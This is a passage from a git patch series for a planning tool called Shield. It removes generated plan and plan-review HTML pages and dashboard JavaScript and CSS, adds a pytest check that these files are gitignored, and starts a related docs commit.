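The idempotency test described above might be sketched as follows. To stay dependency-free, this version swaps the responses-based HTTP mock for an in-memory fake remote, and it passes that fake as an extra remote argument, which the real forward_design_refs(task_id, refs) signature does not have. FakeRemote and the trimmed-down DesignRef and ForwardResult are illustrative stand-ins, not the shared types from EPIC-4-S0.

```python
import hashlib
from dataclasses import dataclass, field


@dataclass(frozen=True)
class DesignRef:
    story_id: str
    anchor_url: str


@dataclass
class ForwardResult:
    created: int = 0
    skipped: int = 0
    errors: list = field(default_factory=list)


class FakeRemote:
    """In-memory stand-in for a PM tool; stores links by (task, key)."""

    def __init__(self):
        self.links = {}


def forward_design_refs(task_id, refs, remote):
    # Illustrative adapter: write a link only if its key is not present yet.
    result = ForwardResult()
    for ref in refs:
        raw = (ref.story_id + ref.anchor_url).encode("utf-8")
        key = hashlib.sha256(raw).hexdigest()[:32]
        if (task_id, key) in remote.links:
            result.skipped += 1
        else:
            remote.links[(task_id, key)] = ref.anchor_url
            result.created += 1
    return result


def test_forward_design_refs_is_idempotent():
    remote = FakeRemote()
    refs = [
        DesignRef("EPIC-4-S3", "trd.md#api"),
        DesignRef("EPIC-4-S3", "trd.md#data-model"),
    ]
    first = forward_design_refs("TASK-1", refs, remote)
    second = forward_design_refs("TASK-1", refs, remote)
    assert (first.created, first.skipped) == (2, 0)
    # Second run: 0 created and N skipped, with no new remote state.
    assert (second.created, second.skipped) == (0, len(refs))
    assert len(remote.links) == len(refs)
```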

Tasks

-
    -
  • Edit shield/commands/pm-sync.md to describe design_refs[] forwarding contract and idempotency key.
  • Implement forward_design_refs in each of the four adapter files above.
  • Adapters that have no link affordance log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.
  • Adapter eval fixtures using responses / respx HTTP mocking; plus the idempotency test from P0-4.
-

Acceptance criteria

-
    -
  • Running /pm-sync against each of {Confluence, Jira, ClickUp, Notion} forwards design_refs[] URLs on the synced task.
  • Running /pm-sync with empty design_refs[] succeeds with no side effect.
  • Adapter fixtures pass in shield/evals/.
  • (P0-4) Running /pm-sync twice on the same plan produces no duplicates — verified by per-adapter idempotency test.
  • (P0-3) All four adapters implement the same forward_design_refs(task_id, refs) → ForwardResult signature from shield/adapters/_common/design_refs.py.
  • (P1-8) action_log entries are emitted per ref with the documented fields.
-
-

EPIC-5 · Drift + duplication hardening · M3

-

(unchanged from plan.md — EPIC-5-S1 and EPIC-5-S2 stay as drafted)

-
-

Out of scope (locked)

| Item | Status |
|---|---|
| /lld <component> command | Template locked at 14 sections per PR #43 sample; authoring command is a separate epic. Typically backend-only. |
| Adapter auto-creation of design-doc pages in Confluence/Notion | v2 enhancement. |
| Structured ClickUp/Notion relationships beyond URL fields | v2 enhancement. |
| Migration tool for existing plan-architecture.md | Direct cutover; files stay readable. |
| trd_sha content hash (vs commit SHA) | Deferred (Architect P2). Worth revisiting after M3 ships if last_aligned_with proves insufficient. |
| template_version field on TRD frontmatter | Deferred (Architect P2). |
| Round-trip integration eval (/plan → /plan-review no Criticals) | Deferred (Architect P2). |
| --dry-run mode for /plan | Deferred (SRE P2). |
| plan-troubleshooting.md | Deferred (SRE P2). |
| Concurrent /pm-sync safety (single-writer note) | Deferred (Backend P2). |
| Magic-number defenses for §8 duplication threshold + §7 implementation-manual threshold | Deferred (Architect P2) — keep as documented constants in EPIC-4-S2 / EPIC-5-S2 tasks. |
| Explicit rollback-trigger statement in plan-architecture.md | Deferred (SRE P1-11) — add to plan-architecture.md in a follow-up commit, not a new story. |
-
-

Next steps

-

After applying this enhanced plan (replacing plan.md and updating plan.json):

-
    -
  1. Update plan.json to reflect the structural changes (new stories EPIC-1-S4, EPIC-2-S3, EPIC-4-S0; modified ACs/tasks on EPIC-1-S2, EPIC-2-S2, EPIC-3-S1, EPIC-3-S2, EPIC-3-S3, EPIC-4-S1, EPIC-4-S3). Bump M1 milestone exit criteria.
  2. Re-run /plan-review and confirm composite ≥ B+ (target: 3.0+).
  3. /pm-sync to push updated stories.
  4. /implement starting with EPIC-4-S0 (adapter scaffolding) or EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail.
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html deleted file mode 100644 index 9a372339..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html +++ /dev/null @@ -1,411 +0,0 @@ - - - - - -Review — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan Review: /plan TRD refactor

-

Date: 2026-05-25
Plan: docs/shield/plan-trd-refactor-20260524/plan.json (+ plan.md, plan-architecture.md)
Reviewers: DX Engineer, Agile Coach, Architect, Backend Engineer, SRE
Composite Score: B / Ready (with P0 fixes recommended before implementation)
Composite numeric: 2.77 (weighted: Architect+DX+Backend = 1.0; Agile+SRE = 0.7)

-

Verdict

-

The plan is structurally ready — sprint-ready stories, testable ACs, milestone DAG is clean, schema design is well-reasoned, reversibility is documented. But three reviewers (SRE, Backend Engineer, Architect) surfaced 6 P0 recommendations that should be addressed before implementation starts. The most consequential: the adapter work in EPIC-4-S3 is materially larger than the plan implies (only 1 of 4 PM-tool adapters exists today as a uv package), and the eval is wired for one-shot PR-body capture rather than recurring CI gating.

-

Score Summary

| Persona | Grade | Weight | Numeric | Key Finding |
|---|---|---|---|---|
| Agile Coach | A- | 0.7 | 4 | Sprint-ready: 12/13 points A/A-, milestone DAG clean, all ACs testable |
| DX Engineer | B+ | 1.0 | 3 | Handoff/specification gaps: section_id heuristic, adapter paths, CI vs PR-body |
| Architect | B | 1.0 | 3 | Edge-case completeness: stale "13-section" refs, off-by-N negatives, no stale-anchor detection |
| SRE | C | 0.7 | 2 | Runtime safety net missing: no recurring CI gate, no rollback trigger, no provenance stamp |
| Backend Engineer | C+ | 1.0 | 2 | Adapter contract missing, idempotency undefined, 3 of 4 adapters don't exist as packages |
-
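
The composite of 2.77 is consistent with a weighted mean of the per-persona numeric scores, using the weights from the review header. The calculation below is a sketch under that assumption; the review itself does not spell out the formula.

```python
# (numeric score, weight) per persona, as listed in the Score Summary.
scores = {
    "Agile Coach": (4, 0.7),
    "DX Engineer": (3, 1.0),
    "Architect": (3, 1.0),
    "SRE": (2, 0.7),
    "Backend Engineer": (2, 1.0),
}

weighted_sum = sum(numeric * weight for numeric, weight in scores.values())
total_weight = sum(weight for _, weight in scores.values())
composite = weighted_sum / total_weight  # 12.2 / 4.4

print(round(composite, 2))  # prints 2.77
```

Under this reading, lifting the two lowest scores (SRE and Backend Engineer) from 2 to 3 would raise the composite to about 3.16, above the 3.0 target.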

P0 Recommendations (block implementation start)

-

These appear with convergent support across multiple reviewers — addressing them is the highest-leverage pre-implementation work.

| # | Recommendation | Origin | Affected story |
|---|---|---|---|
| P0-1 | Fix 14 vs 13 inconsistency across all artifacts. plan-architecture.md lines 25, 37, 75 still say "13-section". EPIC-3-S3 AC says "all 13 negatives" but EPIC-3-S2 enumerates 16 negatives (14 missing-section + 1 drift + 1 vague-TBD). Pick a number and propagate everywhere. | Architect P1 + Backend P0 | EPIC-3-S2, EPIC-3-S3; plan-architecture.md prose |
| P0-2 | Split EPIC-4-S3 or add adapter-scaffolding story. Only shield/adapters/clickup/ exists as a uv package today; Jira/Confluence/Notion don't exist. Either split EPIC-4-S3 by adapter (S3a/b/c/d) or add an EPIC-4-S0 that scaffolds pyproject.toml, MCP-server skeleton, tests/, and a shared shield/adapters/_common/design_refs.py for the DesignRef dataclass and forward_design_refs protocol. | Backend P0 (verified by repo inspection) | EPIC-4-S3 |
| P0-3 | Specify the adapter interface contract. Lock the function signature across all four adapters before implementation: forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult with ForwardResult{created, skipped, errors}. Each DesignRef produces a deterministic idempotency key (sha256(story_id + anchor_url)[:32]) used as globalId for Jira/Confluence remote-links. | Backend P0 | EPIC-4-S3; new schema doc in sidecar-schema.md |
| P0-4 | Add idempotency test fixture to EPIC-4-S3. Add an AC: "Running /pm-sync twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes, no duplicate Notion property writes." Primary regression guard for the most likely incident shape. | Backend P0 + Architect P2 (trd_sha) | EPIC-4-S3, EPIC-2-S2 |
| P0-5 | Wire eval into recurring CI, not just one-shot PR body. EPIC-3-S3 says "Wire eval into CI" but the tasks only describe manual PR-body capture. Add a .github/workflows/ step that runs uv run shield/evals/run.py plan-trd on every PR touching shield/skills/general/plan-docs/** or shield/schema/**. Without this, the next plan-docs/SKILL.md edit silently breaks the 14-section contract. | SRE P0 + DX P1 | EPIC-3-S3 |
| P0-6 | Define mixed-domain failure mode in EPIC-1-S2. "Mixed → annotate per section" is a single line with no worked example, no eval fixture, no AC. Realistic monorepos (Tesseract itself: pyproject.toml + *.tf) will hit this on day 1. Add: (a) a positive-mixed/ fixture under shield/evals/plan-trd/fixtures/, (b) explicit guidance for what "annotate per section" emits, (c) a detection rule (presence of both infra and backend markers). | SRE P0 + DX P1 + Architect P1 (3 reviewers) | EPIC-1-S2, EPIC-3-S1 |
-

P1 Recommendations (should land in implementation milestone)

| # | Recommendation | Origin |
|---|---|---|
| P1-1 | Define section_id heuristic in EPIC-2-S2. The phrase "story title keyword → TRD section anchor" is a hint, not an algorithm. Specify: "lowercase fuzzy match story.name tokens against TRD section anchor slugs; fall back to §7 high-level-design if no token overlaps." | DX P1 |
| P1-2 | Define design_refs[] merge semantics in EPIC-2-S2. "Preserved or updated in place" is ambiguous. Specify: "match by (doc, section_id, component) tuple; replace label if changed, never duplicate keys." | DX P1 |
| P1-3 | Name adapter file paths in EPIC-4-S3. Replace "the relevant adapter logic (Python under shield/adapters/)" with explicit per-tool file paths and the function/class to extend in each. | DX P1 + Agile P2 |
| P1-4 | Rename or rescope EPIC-3-S3. Story title says "CI" but tasks describe manual PR-body capture. Either add a workflow YAML task (with file path) or retitle to "Eval execution + RED-GREEN paper trail". | DX P1 |
| P1-5 | Reconcile domain-detection source. plan.json EPIC-1-S2 description says "detects the dominant domain from .shield.json + repo markers"; plan.md says only "repo markers". Pick one and document the config key if .shield.json is in. | DX P1 |
| P1-6 | Add stale-anchor detection to /plan-review. When a story's design_refs[].anchor_url points at a #section-id no longer present in the live trd.md, /plan-review should report it as a Critical finding. Otherwise sidecar→doc drift goes undetected. | Architect P1 |
| P1-7 | Add JSON Schema validator story. Two version bumps (1.1→1.2→1.3) in one PR series without a machine-readable validator is the drift inflection. Add shield/scripts/validate_plan.py using pydantic or jsonschema. Invoked by /plan-review and the eval runner. | Backend P1 |
| P1-8 | Specify observability shape for adapter forwarding. Each design_refs[] forward emits one action_log entry with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit forward_design_ref_failed with {error_class, http_status}. | Backend P1 |
| P1-9 | Add deprecation overlap for output-paths.yaml. Keep plan_arch_md / plan_arch_html keys with deprecated: true rather than removing in M1. Remove in M3 or follow-up PR to protect external consumers of the contract. | Backend P1 |
| P1-10 | Add provenance stamp on emitted TRDs. Top-of-file comment: <!-- generated by /plan vX.Y.Z on YYYY-MM-DD -->. Pairs with last_aligned_with for full drift accountability. | SRE P1 |
| P1-11 | Add rollback-trigger statement. Plan-architecture.md §Rollback should name observable signals that trigger a revert: e.g., (a) eval fails on positive fixtures after merge, (b) >N user-reported broken /plan runs within 48h, (c) downstream /pm-sync adapter errors trace back to schema 1.2. | SRE P1 |
| P1-12 | Add version-bump task per CLAUDE.md mandate. Bump .claude-plugin/marketplace.json and pyproject.toml per the "When updating any plugin, bump its version in both...in the same commit" rule. Currently absent from every story. | SRE P1 + DX P2 |
| P1-13 | Add tool-and-access requirements subsection. Which Confluence/Jira/ClickUp/Notion test tenants (or mock client expectations), where credentials live (.shield.json? env vars?), which Python deps the eval pulls. | DX P1 |
| P1-14 | Specify atomic write for /plan output. If /plan cannot write trd.md (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed. | SRE P1 |
| P1-15 | Specify forward-compat policy in sidecar-schema.md. How does /plan-review handle version: "1.4" from a future Shield? Reject, warn, or accept-with-ignored-fields? | Backend P1 |
-
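
The "temp file + rename" approach from P1-14 can be sketched with the standard library as below. The helper name write_atomically is hypothetical, and this is one common way to get the behavior rather than how /plan is known to write trd.md.

```python
import os
import tempfile
from pathlib import Path


def write_atomically(path, text: str) -> None:
    """Write text to path so readers never observe a partial file."""
    path = Path(path)
    # Create the temp file in the target directory so the final rename
    # stays on one filesystem, which is what makes os.replace atomic.
    fd, tmp_name = tempfile.mkstemp(
        dir=path.parent, prefix=path.name + ".", suffix=".tmp"
    )
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as handle:
            handle.write(text)
            handle.flush()
            os.fsync(handle.fileno())  # push the bytes to disk before renaming
        os.replace(tmp_name, path)
    except BaseException:
        # Fail loudly, but remove the partial temp file first.
        try:
            os.unlink(tmp_name)
        except FileNotFoundError:
            pass
        raise
```

If the write fails partway, the existing trd.md (if any) is left untouched and only the temporary file is removed, which matches the "must not leave a corrupted file behind" requirement.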

P2 Recommendations (nice to have)

| # | Recommendation | Origin |
|---|---|---|
| P2-1 | Split EPIC-3-S2 into "negative-fixture generator + 14 missing-section fixtures" and "drift + vague-TBD fixtures" for tighter sizing | Agile P2 |
| P2-2 | Add CHANGELOG entry / migration-note AC for the cutover | Agile P2 |
| P2-3 | Make intra-milestone story depends_on explicit in plan.json | Agile P2 |
| P2-4 | Lock the eval runner invocation (drop "or equivalent existing eval runner") | DX P2 |
| P2-5 | Pick YAML or JSON for the slug allow-list sidecar | DX P2 |
| P2-6 | Add inline design_refs[] JSON example in EPIC-2-S1 | DX P2 |
| P2-7 | Add AC for /pm-sync partial-failure behavior (1 of 4 adapters errors) | DX P2 |
| P2-8 | Add "local development" how-to-run note in plan-architecture.md | DX P2 |
| P2-9 | Defend or parameterize magic numbers (>80 char overlap, >20 line code block) | Architect P2 |
| P2-10 | Add trd_sha content hash alongside last_aligned_with for true undead-doc detection | Architect P2 |
| P2-11 | Add TRD template_version field for legitimate template evolution | Architect P2 |
| P2-12 | Add round-trip integration eval (/plan output → /plan-review says no Criticals) | Architect P2 |
| P2-13 | Add --dry-run mode for /plan so users validate locally before committing | SRE P2 |
| P2-14 | Add a one-page troubleshooting block (plan-troubleshooting.md) | SRE P2 |
| P2-15 | Add eval fixture for M2 running on pre-M1 plan-architecture.md-only folders | SRE P2 |
| P2-16 | Concurrent /pm-sync note (single-writer until idempotency-key lands) | Backend P2 |
| P2-17 | Rate-limit handling note per existing adapter posture | Backend P2 |
| P2-18 | Decide fate of this plan's own plan-architecture.md post-M1 (rename or freeze) | Backend P2 |
-

Cross-reviewer convergence

-

The strongest signal is convergent flagging — recommendations cited by 2+ reviewers:

| Theme | Reviewers | Severity |
|---|---|---|
| Mixed-domain handling (EPIC-1-S2) | DX, SRE, Architect (3) | P0 |
| 14 vs 13 inconsistency | Architect, Backend (2) | P0 |
| EPIC-4-S3 adapter file paths | DX, Agile, Backend (3) | P0 (escalated) |
| CI wiring vs PR-body capture | DX, SRE (2) | P0 |
| Version-bump discipline | DX, SRE (2) | P1 |
| Idempotency / re-run safety | Architect, Backend (2) | P0 |
-

Detailed Agent Findings

- -

Next steps

-
    -
  1. Apply the enhanced plan (enhanced-plan.md) which carries the P0 fixes and most P1 recommendations
  2. After applying, re-run /plan-review to confirm composite moves above 3.0 (target: B+/Ready-clean)
  3. Then /pm-sync to push the updated stories
  4. Then /implement starting with EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail
- -
-
Generated by Shield
- - diff --git a/docs/shield/shield-dashboard.js b/docs/shield/shield-dashboard.js deleted file mode 100644 index 727f693b..00000000 --- a/docs/shield/shield-dashboard.js +++ /dev/null @@ -1,62 +0,0 @@ -// Builds the dashboard card grid + pipeline strip from window.SHIELD_MANIFEST. -// index.html sits at docs/shield root, so root prefix is "". -(function () { - function el(tag, cls, html) { - var e = document.createElement(tag); - if (cls) e.className = cls; - if (html != null) e.innerHTML = html; - return e; - } - var LINKS = [ - ["research", "Research", "research.html"], - ["prd", "PRD", "prd.html"], - ["trd", "TRD", "trd.html"], - ["plan_md", "Plan", "plan.html"], - ]; - var PIPELINE = [ - ["Research", function (a) { return a.research; }], - ["PRD", function (a) { return a.prd; }], - ["Plan", function (a) { return a.plan_md || a.plan_json; }], - ["Implement", function (a, f) { return (f.reviews && f.reviews.code && f.reviews.code.count) > 0; }], - ]; - function card(f) { - var c = el("div", "dash-card"); - var head = el("div"); - head.appendChild(el("h3", null, f.name)); - head.appendChild(el("span", "date", f.updated ? f.updated.slice(0, 10) : "")); - c.appendChild(head); - var pipe = el("div", "pipeline"); - PIPELINE.forEach(function (p) { - var done = !!p[1](f.artifacts || {}, f); - pipe.appendChild(el("span", "pipe-step" + (done ? 
" done" : ""), p[0])); - }); - c.appendChild(pipe); - var links = el("div", "dash-links"); - LINKS.forEach(function (l) { - if (f.artifacts && f.artifacts[l[0]]) { - var a = el("a", null, l[1]); - a.setAttribute("href", f.name + "/outputs/" + l[2]); - links.appendChild(a); - } - }); - if (f.artifacts && f.artifacts.plan_json) { - var aj = el("a", null, "Sidecar JSON"); - aj.setAttribute("href", f.name + "/plan.json"); - links.appendChild(aj); - } - c.appendChild(links); - return c; - } - document.addEventListener("DOMContentLoaded", function () { - var mount = document.getElementById("shield-dashboard"); - if (!mount) return; - var features = (window.SHIELD_MANIFEST && window.SHIELD_MANIFEST.features) || []; - if (!features.length) { - mount.appendChild(el("div", "dash-empty", "No features yet — run /research or /plan to get started.")); - return; - } - var grid = el("div", "dash-grid"); - features.forEach(function (f) { grid.appendChild(card(f)); }); - mount.appendChild(grid); - }); -})(); diff --git a/docs/shield/shield-nav.js b/docs/shield/shield-nav.js deleted file mode 100644 index 78095491..00000000 --- a/docs/shield/shield-nav.js +++ /dev/null @@ -1,160 +0,0 @@ -// Header breadcrumb + filterable Features panel, built from window.SHIELD_MANIFEST. -// Pure logic (crumbModel, filterFeatures, titleize) is separated from DOM -// rendering and exported for unit tests (node:test). The DOM bootstrap is -// guarded by `typeof document`, so requiring this file in Node is safe. -// No fetch — data comes from manifest.js. file:// safe. 
-(function () { - var FILE_LABELS = { - "prd.html": "PRD", "trd.html": "TRD", "plan.html": "Plan", - "research.html": "Research", "plan-architecture.html": "Architecture", - "summary.html": "Review", "enhanced-prd.html": "Enhanced PRD", - "enhanced-plan.html": "Enhanced Plan", "index.html": "Dashboard", - }; - // artifact key -> [label, path-within-feature, tag] - var ARTIFACTS = [ - ["research", "Research", "outputs/research.html", "research"], - ["prd", "PRD", "outputs/prd.html", "prd"], - ["trd", "TRD", "outputs/trd.html", "trd"], - ["plan_md", "Plan", "outputs/plan.html", "plan"], - ["plan_arch_md", "Architecture", "outputs/plan-architecture.html", "arch"], - ["plan_json", "Sidecar JSON", "plan.json", "json"], - ]; - - function titleize(file) { - return file.replace(/\.html$/, "").replace(/[-_]/g, " ") - .replace(/\b\w/g, function (c) { return c.toUpperCase(); }); - } - - // Breadcrumb model from a URL path + the page's root prefix. - // Returns [{label, href|null, active}]. - function crumbModel(pathname, root) { - var parts = decodeURIComponent(pathname).split("/").filter(Boolean); - var file = parts[parts.length - 1] || "index.html"; - var oi = parts.lastIndexOf("outputs"); - if (file === "index.html" || oi <= 0) { - return [{ label: "Dashboard", href: null, active: true }]; - } - var crumb = [{ label: "Dashboard", href: root + "index.html", active: false }]; - crumb.push({ label: parts[oi - 1], href: null, active: false }); - var ri = parts.lastIndexOf("reviews"); - if (ri !== -1 && ri > oi) { - crumb.push({ label: (parts[ri + 1] || "") + " review · " + (parts[ri + 2] || ""), href: null, active: true }); - } else { - crumb.push({ label: FILE_LABELS[file] || titleize(file), href: null, active: true }); - } - return crumb; - } - - // Filtered, grouped feature model from the manifest + a search query. - // Returns [{name, docs:[{label,href,tag}], reviews:[{label,href}]}]. 
- function filterFeatures(manifest, query, root) { - var features = (manifest && manifest.features) || []; - var q = (query || "").trim().toLowerCase(); - var out = []; - features.forEach(function (f) { - var fm = f.name.toLowerCase().indexOf(q) !== -1; - var docs = []; - ARTIFACTS.forEach(function (a) { - if (f.artifacts && f.artifacts[a[0]] && (!q || fm || a[1].toLowerCase().indexOf(q) !== -1)) { - docs.push({ label: a[1], href: root + f.name + "/" + a[2], tag: a[3] }); - } - }); - var reviews = []; - ["prd", "plan", "code"].forEach(function (rt) { - var rv = f.reviews && f.reviews[rt]; - if (rv && rv.entries) { - rv.entries.forEach(function (en) { - var label = rt + " review · " + en.date; - if (!q || fm || label.toLowerCase().indexOf(q) !== -1) { - reviews.push({ label: label, href: root + en.path }); - } - }); - } - }); - if (docs.length || reviews.length) out.push({ name: f.name, docs: docs, reviews: reviews }); - }); - return out; - } - - // Export pure logic for unit tests (Node). Browsers load this as a classic - // script where `module` is undefined, so this branch is a no-op there. - if (typeof module !== "undefined" && module.exports) { - module.exports = { crumbModel: crumbModel, filterFeatures: filterFeatures, titleize: titleize }; - } - - // Below here is browser-only DOM wiring. - if (typeof document === "undefined") return; - - function el(tag, cls, html) { - var e = document.createElement(tag); - if (cls) e.className = cls; - if (html != null) e.innerHTML = html; - return e; - } - - function renderCrumb(model) { - var crumb = document.getElementById("shield-crumb"); - if (!crumb) return; - crumb.innerHTML = ""; - model.forEach(function (seg, i) { - if (i) crumb.appendChild(el("span", "chev", "›")); - if (seg.href) { - var a = el("a", seg.active ? "here" : null, seg.label); - a.setAttribute("href", seg.href); - crumb.appendChild(a); - } else { - crumb.appendChild(el("span", seg.active ? 
"here" : null, seg.label)); - } - }); - } - - function renderResults(model, container) { - container.innerHTML = ""; - if (!model.length) { container.appendChild(el("div", "docs-empty", "No docs match")); return; } - model.forEach(function (f) { - container.appendChild(el("div", "feat-name", f.name)); - f.docs.forEach(function (d) { - var a = el("a", "doc", d.label + '' + d.tag + ""); - a.setAttribute("href", d.href); - container.appendChild(a); - }); - f.reviews.forEach(function (r) { - var a = el("a", "doc rev", "↳ " + r.label); - a.setAttribute("href", r.href); - container.appendChild(a); - }); - }); - } - - document.addEventListener("DOMContentLoaded", function () { - var root = document.body.dataset.shieldRoot || ""; - renderCrumb(crumbModel(location.pathname, root)); - - var btn = document.getElementById("docs-toggle"); - var panel = document.getElementById("docs-panel"); - var search = document.getElementById("docs-search"); - var results = document.getElementById("docs-results"); - if (!btn || !panel || !search || !results) return; - - function paint() { renderResults(filterFeatures(window.SHIELD_MANIFEST, search.value, root), results); } - function open() { - panel.classList.add("open"); btn.setAttribute("aria-expanded", "true"); - search.value = ""; paint(); search.focus(); - } - function close() { panel.classList.remove("open"); btn.setAttribute("aria-expanded", "false"); } - - btn.addEventListener("click", function (e) { - e.stopPropagation(); - panel.classList.contains("open") ? 
close() : open(); - }); - search.addEventListener("input", paint); - search.addEventListener("click", function (e) { e.stopPropagation(); }); - document.addEventListener("keydown", function (e) { - if (e.key === "Escape") close(); - if ((e.metaKey || e.ctrlKey) && e.key.toLowerCase() === "k") { e.preventDefault(); open(); } - }); - document.addEventListener("click", function (e) { - if (!e.target.closest(".feat-wrap")) close(); - }); - }); -})(); diff --git a/docs/shield/shield.css b/docs/shield/shield.css deleted file mode 100644 index 6ea3b4bf..00000000 --- a/docs/shield/shield.css +++ /dev/null @@ -1,81 +0,0 @@ -:root { - --accent:#1a73e8; --bg:#ffffff; --panel:#f7f9fc; --text:#1f1f1f; - --muted:#5a6370; --border:#e4e8ee; --green:#3fb950; --green-bg:#e9f7ee; -} -* { box-sizing:border-box; } -body { margin:0; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",system-ui,sans-serif; - line-height:1.6; color:var(--text); background:var(--bg); } -/* Header — breadcrumb + Features panel */ -.shield-header { display:flex; align-items:center; gap:12px; padding:10px 18px; - border-bottom:1px solid var(--border); background:#fff; position:sticky; top:0; z-index:50; font-size:.92rem; } -.shield-header .brand { font-weight:700; color:var(--text); text-decoration:none; white-space:nowrap; } -.shield-header .bar-sep { color:#9aa3af; } -.crumb { color:var(--muted); white-space:nowrap; overflow:hidden; text-overflow:ellipsis; } -.crumb a { color:var(--muted); text-decoration:none; } -.crumb a:hover { color:var(--accent); } -.crumb .chev { color:#c2c8d0; margin:0 5px; } -.crumb .here { color:var(--accent); font-weight:600; } -.bar-spacer { flex:1; } -.feat-wrap { position:relative; } -.feat-btn { cursor:pointer; border:1px solid var(--border); background:var(--panel); - color:var(--accent); border-radius:6px; padding:5px 12px; font-size:.92rem; white-space:nowrap; } -.feat-btn:hover { border-color:var(--accent); } -.feat-panel { display:none; position:absolute; right:0; 
top:115%; width:330px; background:#fff; - border:1px solid var(--border); border-radius:10px; box-shadow:0 10px 30px rgba(0,0,0,.12); - padding:10px; max-height:74vh; overflow:auto; } -.feat-panel.open { display:block; } -.docs-search { width:100%; border:1px solid var(--border); border-radius:7px; padding:8px 10px; - font-size:.85rem; outline:none; } -.docs-search:focus { border-color:var(--accent); } -.feat-name { font-weight:600; font-size:.82rem; margin:10px 4px 2px; color:var(--text); } -.doc { display:flex; align-items:center; gap:8px; padding:5px 8px 5px 14px; border-radius:6px; - color:var(--accent); text-decoration:none; font-size:.85rem; } -.doc:hover { background:var(--panel); } -.doc .tag { margin-left:auto; font-size:.62rem; color:var(--muted); background:var(--panel); - border:1px solid var(--border); border-radius:10px; padding:0 6px; text-transform:uppercase; } -.doc.rev { color:var(--muted); padding-left:22px; } -.docs-empty { color:var(--muted); font-size:.8rem; padding:8px 6px; } -/* Main content */ -.shield-main { max-width:960px; margin:0 auto; padding:36px 28px 96px; } -h1,h2,h3,h4 { color:var(--accent); line-height:1.25; } -h1 { font-size:2rem; border-bottom:2px solid var(--accent); padding-bottom:8px; margin-bottom:24px; } -h2 { font-size:1.45rem; margin-top:40px; padding-top:12px; border-top:1px solid var(--border); } -h3 { font-size:1.15rem; margin-top:28px; } -h4 { font-size:1rem; color:var(--text); margin-top:20px; } -p,ul,ol { margin:12px 0; } li { margin:4px 0; } -table { border-collapse:collapse; width:100%; margin:16px 0; font-size:.94rem; } -th,td { padding:8px 12px; border:1px solid var(--border); text-align:left; vertical-align:top; } -th { background:var(--panel); font-weight:600; } -tr:nth-child(even) td { background:#fbfcfd; } -blockquote { border-left:3px solid var(--accent); margin:16px 0; padding:4px 16px; - color:var(--muted); background:var(--panel); } -code { background:#f1f3f6; padding:2px 6px; border-radius:3px; - 
font-family:"JetBrains Mono","SF Mono",Consolas,monospace; font-size:.9em; } -pre { background:var(--panel); padding:12px 16px; border-radius:6px; overflow-x:auto; - border:1px solid var(--border); } -pre.mermaid { background:transparent; border:none; padding:0; text-align:center; } -a { color:var(--accent); } -hr { border:none; border-top:1px solid var(--border); margin:32px 0; } -.toc,.meta-banner { background:var(--panel); border:1px solid var(--border); - border-left:3px solid var(--accent); border-radius:6px; padding:16px 20px; margin-bottom:28px; font-size:.94rem; } -.toc-title { font-weight:600; margin-bottom:6px; } -.shield-footer { max-width:960px; margin:0 auto; padding:24px 28px; color:var(--muted); - font-size:.85rem; border-top:1px solid var(--border); } -/* Dashboard */ -.dash-grid { display:grid; grid-template-columns:repeat(auto-fill,minmax(280px,1fr)); gap:16px; } -.dash-card { border:1px solid var(--border); border-radius:8px; padding:16px; background:#fff; } -.dash-card h3 { margin:0 0 4px; color:var(--text); font-size:1.05rem; } -.dash-card .date { color:var(--muted); font-size:.8rem; } -.dash-links { display:flex; flex-wrap:wrap; gap:8px; margin-top:10px; } -.dash-links a { font-size:.85rem; border:1px solid var(--border); border-radius:6px; - padding:3px 9px; text-decoration:none; } -.pipeline { display:flex; gap:4px; margin-top:10px; font-size:.72rem; } -.pipe-step { border-radius:8px; padding:1px 7px; background:#f1f3f6; color:var(--muted); } -.pipe-step.done { background:var(--green-bg); color:var(--green); } -.badge { display:inline-block; background:var(--green-bg); color:var(--green); - border-radius:12px; padding:.1em .6em; font-size:.75rem; font-weight:600; } -.dash-empty { color:var(--muted); padding:40px; text-align:center; } -/* Plan story components */ -.story { border:1px solid var(--border); border-radius:8px; padding:20px; margin:25px 0; } -.epic-meta { background:var(--panel); border:1px solid var(--border); border-radius:8px; 
padding:15px 20px; margin:20px 0; } -.milestone { margin:16px 0; padding:12px 16px; border-left:3px solid var(--accent); background:var(--panel); } diff --git a/shield/scripts/test_gitignore_html_artifacts.py b/shield/scripts/test_gitignore_html_artifacts.py new file mode 100644 index 00000000..dc96b716 --- /dev/null +++ b/shield/scripts/test_gitignore_html_artifacts.py @@ -0,0 +1,29 @@ +"""Eval: .gitignore demotes Shield HTML to a build artifact.""" +from __future__ import annotations + +import subprocess +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[2] # repo root +GITIGNORE = ROOT / ".gitignore" + +REQUIRED_PATTERNS = [ + "**/docs/shield/*/outputs/", + "**/docs/shield/index.html", + "**/docs/shield/manifest.js", +] + + +def test_gitignore_has_html_artifact_rules(): + text = GITIGNORE.read_text() + for pat in REQUIRED_PATTERNS: + assert pat in text, f".gitignore missing rule: {pat}" + + +def test_no_shield_html_tracked(): + out = subprocess.run( + ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"], + cwd=ROOT, capture_output=True, text=True, + ) + tracked = [l for l in out.stdout.splitlines() if l.strip()] + assert tracked == [], f"HTML/assets still tracked: {tracked}" From 2285ea99249d7215dcdcc83785f76503216cc07f Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:28:18 +0000 Subject: [PATCH 07/10] docs(shield): describe HTML output as a gitignored build artifact Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/docs/artifacts.md | 4 ++-- shield/hooks/scripts/session-start.sh | 2 +- 